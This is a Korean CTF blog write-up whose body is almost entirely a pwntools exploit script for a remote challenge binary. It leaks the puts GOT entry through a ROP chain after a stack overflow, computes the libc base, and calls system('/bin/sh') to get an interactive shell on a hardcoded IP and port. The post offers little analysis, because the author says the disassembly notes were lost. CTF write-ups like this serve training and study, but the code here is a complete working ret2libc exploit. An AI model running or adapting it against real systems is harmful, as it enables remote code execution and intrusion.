반응형
문제소스
보호기법
문제 분석 및 페이로드
문제 분석 text file은 살아있으나
아이다 데이터베이스 파일이 날라가서 죄송합니다ㅠㅠㅠ
익스플로잇 코드를 보시면 이해가 빠르실 겁니다.
from pwn import *
#context.log_level='critical'
context.log_level='debug'
#p=process("./chall")
e=ELF("./chall")
puts_plt=e.plt['puts']
puts_got=e.got['puts']
pr=0x0000000000400c03 #pop rdi; ret;
dns,port="34.121.211.139", 2222
p=remote(dns,port)
for i in range(13):
p.sendlineafter("Your Choice > ",str(1))
p.sendlineafter("Green Signal, write whaterver you want to: ",str(4))
p.sendlineafter("Your Choice > ",str(2))
p.sendlineafter("Enter the vehicle id: ",str(0))
p.sendlineafter("Yellow Signal, write for your vehicle:",str(1024))
p.sendlineafter("Your Choice > ",str(3))
p.sendlineafter("Enter the vehicle id: ",str(1))
p.sendlineafter("Do you have any comments?\n",str(1))
#leak plt_got and return to menu 3
pay="A"*0x40
pay+="B"*8
pay+=p64(pr)
pay+=p64(puts_got)
pay+=p64(puts_plt)
pay+=p64(0x4008e7)#menu 3
p.sendlineafter("Please enter your comments\n",pay)
leak=u64(p.recvline()[:-1].ljust(8,"\x00"))
base=leak-0x80aa0
system=base+0x4f550
sh_addr=base+0x1b3e1a
print "puts_got leak="+hex(leak)
#menu 3 and execute system function
pay2="A"*0x40
pay2+="B"*8
pay2+=p64(pr)
pay2+=p64(sh_addr)
pay2+=p64(0x000000000040061e)#ret
pay2+=p64(system)
p.sendlineafter("Enter the vehicle id: ",str(1))
p.sendlineafter("Do you have any comments?\n",str(1))
p.sendlineafter("Please enter your comments\n",pay2)
p.interactive()
반응형
'War Games > ctf-review' 카테고리의 다른 글
| [dctf 2021] Formats last theorem (0) | 2021.05.19 |
|---|---|
| [OMH CTF2021] Framed (0) | 2021.05.17 |
| [dctf2021] baby_bof (0) | 2021.05.17 |
| [pwnpwn] ezpwn (0) | 2021.05.17 |
| [AngstromCTF2021] stickystacks (0) | 2021.04.06 |